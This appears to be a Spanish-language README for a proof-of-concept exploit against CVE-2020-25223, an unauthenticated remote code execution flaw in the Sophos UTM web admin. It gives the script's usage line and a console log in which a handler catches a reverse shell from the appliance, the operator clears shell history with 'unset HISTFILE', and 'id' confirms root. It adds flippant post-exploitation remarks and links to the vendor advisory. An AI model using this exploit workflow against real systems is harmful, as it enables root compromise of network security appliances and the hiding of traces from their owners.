
Prueba de concepto del exploit para CVE-2020-25223 (RCE sin autenticación en la administración web de Sophos UTM) que entrega una reverse shell. Incluye notas de post-explotación y guía de detección.
CVE-2020-25223 RCE PoC, obtiene una reverse shell. Pre-auth. Lo implementé rápidamente porque se necesitaba para unificar algunos imanes de amenazas.
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
#
No está implementado aquí, solo usa la plantilla de nuclei.
Estos tienen un intérprete de Python y, de hecho, un entorno Linux muy completo disponible. Potencial asombroso para la post-explotación.
Seguro que alguien a quien le importe puede completar esto. Bitter (un subconjunto del "twitter del equipo azul") probablemente lo haga en breve. Quiero decir, no puede ser tan difícil detectar una reverse shell sin cifrar que sale de tu caja Unified Threat Manager, ¿verdad?
Alguien (presumiblemente de Sophos) envió esto, es el enlace oficial de la corrección. Ve a actualizar tu UTM. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce
Referencia de terceros (detalles del fallo): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
Quejas directas a Sophos, que de algún modo pensó que pasar la entrada del usuario a open() en Perl era una buena idea en el siglo XXI.